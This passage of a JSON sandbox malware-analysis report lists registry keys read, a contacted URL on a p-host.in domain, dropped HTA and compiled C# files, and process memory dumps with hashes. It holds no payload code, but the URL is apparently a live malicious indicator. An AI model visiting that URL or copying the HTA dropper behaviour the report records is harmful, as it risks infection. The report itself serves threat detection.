"reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell\\1", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\Environment", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Environment", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\HardwareEvents\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Internet Explorer\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Key Management Service\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Media Center\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\OAlerts\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\System\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Windows PowerShell\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Word", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Word\\Resiliency", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Word\\Resiliency", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\14.0\\Word\\Resiliency\\StartupItems", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\14.0", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\14.0\\Word", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\14.0\\Word\\Resiliency\\StartupItems", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\14.0\\Word\\Resiliency", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\14.0\\Word\\Resiliency", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Word\\Resiliency\\StartupItems", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Word", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0", "type": "registry_artifact", "version": 1 } ], "type": "artifacts", "urls": [ { "operations": "GET", "type": "url_artifact", "url": "www.samyrai777m.p-host.in/t/tp.php?thread=0", "version": 1 } ], "version": 1 }, "extracted_files": [ { "archive_path": "extracted_files/48233228f9babdd3bcac5b85d5ae258f91204f7e", "file_type": "created_file", "id": "file_2", "md5_hash": "667a8968a36880dc4147d2ce00c64b30", "norm_filename": "c:\\users\\aetadzjz\\desktop\\logo.cs", "sha1_hash": "48233228f9babdd3bcac5b85d5ae258f91204f7e", "sha256_hash": "8aea15951d21f30f44a8d7499472b62473203959659eeb2b9059b64698deacfd", "size": 1098, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_3", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\91rxrejg.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_7", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\91rxrejg.err", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_10", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\result.exex", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/6ba244d7eb6a6facd2b4c4e946e26987d2336e8b", "file_type": "created_file", "id": "file_4", "md5_hash": "3992ea6c0751d769815a98c4cffcadce", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\91rxrejg.0.cs", "sha1_hash": "6ba244d7eb6a6facd2b4c4e946e26987d2336e8b", "sha256_hash": "b12a34c289c97db64f4267e5c67b70f4fefedfe28ae6527e7721a6ef3e4e0adc", "size": 1101, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/2024365b4311bc93867119ceee7c876683fef607", "file_type": "created_file", "id": "file_5", "md5_hash": "8d42a6a6ddda3cb8546ef4cb888dbfa8", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\91rxrejg.cmdline", "sha1_hash": "2024365b4311bc93867119ceee7c876683fef607", "sha256_hash": "f0d80af454b0e9060f13236c0827a4df63d61ac4964a174c999f4aa2895ff00e", "size": 288, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/f1fae130030df5b4dff15ed820ca35665886ea98", "file_type": "created_file", "id": "file_6", "md5_hash": "51bfb6f473aa25324ee1ed9830ca806e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\91rxrejg.out", "sha1_hash": "f1fae130030df5b4dff15ed820ca35665886ea98", "sha256_hash": "60a57285c3ccbfa3f03f050681e54c27de4ef1766fe6151104a919b7f7c8fa2e", "size": 379, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/1284d7400f30f5a2c409f3f53fcf34b30c32268d", "file_type": "modified_file", "id": "file_8", "md5_hash": "13b131d98fea2526196b20496ec68b0a", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\x9ohk109\\t[1].hta", "sha1_hash": "1284d7400f30f5a2c409f3f53fcf34b30c32268d", "sha256_hash": "ae09b5dc38c85387a861cb4aee8b08ef6c7b216f21ba1bd06c9d1b3adab46a75", "size": 3313, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/1284d7400f30f5a2c409f3f53fcf34b30c32268d", "file_type": "modified_file", "id": "file_9", "md5_hash": "13b131d98fea2526196b20496ec68b0a", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\x9ohk109\\t[2].hta", "sha1_hash": "1284d7400f30f5a2c409f3f53fcf34b30c32268d", "sha256_hash": "ae09b5dc38c85387a861cb4aee8b08ef6c7b216f21ba1bd06c9d1b3adab46a75", "size": 3313, "type": "extracted_file", "version": 1 } ], "process_dumps": [ { "archive_path": "process_dumps/process_00000001-region_00000397-addr_0x00000000099b0000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000001-region_00000397-addr_0x00000000099b0000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_11", "md5_hash": "289d69570ded5db52247f822dda8235e", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "e4693ea274d51afab8b162d35ca98eb1ee68c393", "sha256_hash": "dd5f6c123a9efafef1c47d2ae863349dd0c97f966b9e3e34570031910ba0b5a7", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000402-addr_0x000007fffff78000-size_0x0000000000002000-perm_rw.bin", "filename": "process_00000001-region_00000402-addr_0x000007fffff78000-size_0x0000000000002000-perm_rw.bin", "id": "proc_dump_12", "md5_hash": "246bec9ff45068c2fea0d6ed31491b5d", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "49ebd5510184d6cda8e0c36795825450a88311ad", "sha256_hash": "667e40b334a3553e99c060a8b86fa600998cfea0e8f2297f8c8e5984d606c2f3", "size": 8192, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000403-addr_0x000007fffff7a000-size_0x0000000000002000-perm_rw.bin", "filename": "process_00000001-region_00000403-addr_0x000007fffff7a000-size_0x0000000000002000-perm_rw.bin", "id": "proc_dump_13", "md5_hash": "7c1b5d816f3217cc841de2470ecb0ab7", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "9fd92c2e4799a01f26eeb96d3656f42608a71ff9", "sha256_hash": "9c0134961353ab0c873cb4755b63d934971c913df3bd6505152d4deb7ddda1bd", "size": 8192, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000404-addr_0x0000000002a10000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000404-addr_0x0000000002a10000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_14", "md5_hash": "0b9f986f0e366bca57d501f16d649aa8", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "39298947eadd8cab3faeb7608aeebb781b93d198", "sha256_hash": "48699533ba2ceab840a0920d569e177914b63c4c2654f00c2a44eed6f72762fe", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000405-addr_0x0000000002a20000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000405-addr_0x0000000002a20000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_15", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000406-addr_0x0000000002a30000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000406-addr_0x0000000002a30000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_16", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000407-addr_0x0000000002c70000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000407-addr_0x0000000002c70000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_17", "md5_hash": "43b6d61759568e4ac3d4d2a847bcdf5d", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "1241696cf105ee3ff6bb9e86ade44ea517297ee3", "sha256_hash": "e6677d53f7e55e3abeffbb77034cab21cdad20935012ca6627efa00916af651d", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000408-addr_0x0000000002e80000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000001-region_00000408-addr_0x0000000002e80000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_18", "md5_hash": "bb02ae3f1fb268719dafaa2991c3850e", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "c1d9a14a02f721ccfaf18a68e0e0d27b5b151248", "sha256_hash": "b91021be6c0d09aa98df1596727f8b89c4fd8cbacdcb4898daf75348e56fd968", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000409-addr_0x0000000002f80000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000409-addr_0x0000000002f80000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_19", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000410-addr_0x0000000002f90000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000410-addr_0x0000000002f90000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_20", "md5_hash": "4e8e78b12c5b1705aef682ca8f30c495", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "1c5f6571a31dbe3c12d1f62a049347e50271c27c", "sha256_hash": "15ac0c91d8a82e95f254f561a0d8f32cf33e6429c5150070a3f6832141fab37e", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000411-addr_0x0000000002fa0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000411-addr_0x0000000002fa0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_21", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000412-addr_0x0000000002fb0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000412-addr_0x0000000002fb0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_22", "md5_hash": "b316bbc266dad34fabc1aa5587300bd9", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "5ff8e293ad2c7d36ee2ca6b03ddf333376a119d7", "sha256_hash": "240776fee73e7978e2ca459b3af2473078bfb8d18f60d571e310055f84581010", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000413-addr_0x0000000004790000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000413-addr_0x0000000004790000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_23", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000414-addr_0x00000000049a0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000414-addr_0x00000000049a0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_24", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000415-addr_0x0000000004c90000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000415-addr_0x0000000004c90000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_25", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000416-addr_0x0000000004ca0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000416-addr_0x0000000004ca0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_26", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000417-addr_0x0000000004cb0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000417-addr_0x0000000004cb0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_27", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000418-addr_0x0000000004cc0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000418-addr_0x0000000004cc0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_28", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000419-addr_0x0000000004dd0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000419-addr_0x0000000004dd0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_29", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000420-addr_0x0000000004de0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000420-addr_0x0000000004de0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_30", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000421-addr_0x0000000004df0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000421-addr_0x0000000004df0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_31", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000422-addr_0x0000000005680000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000422-addr_0x0000000005680000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_32", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000423-addr_0x0000000005690000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000423-addr_0x0000000005690000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_33", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000424-addr_0x00000000056a0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000424-addr_0x00000000056a0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_34", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000425-addr_0x00000000056b0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000425-addr_0x00000000056b0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_35", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000426-addr_0x00000000056c0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000426-addr_0x00000000056c0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_36", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000427-addr_0x00000000056d0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000427-addr_0x00000000056d0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_37", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000428-addr_0x00000000058e0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000428-addr_0x00000000058e0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_38", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000429-addr_0x00000000058f0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000429-addr_0x00000000058f0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_39", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000430-addr_0x0000000005900000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000430-addr_0x0000000005900000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_40", "md5_hash": "e46f20869aee8b9ca2350486844568c6", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0dfe752d9424920107476507f0f77185c8a79f54", "sha256_hash": "88eac3b0090f6060302a09bc2d06012ae6d5a37f93754dd00e4ca373178d2581", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000431-addr_0x0000000005910000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000431-addr_0x0000000005910000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_41", "md5_hash": "ec46ebd3e72aa3d43efe546620f14506", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "7c582e2c0d0e886efa17b9e9242b5af30d8864b0", "sha256_hash": "a76cb9626ba8acc91ab11799a5e5a02d06ce74ba22971041ddc606f6e59e3600", 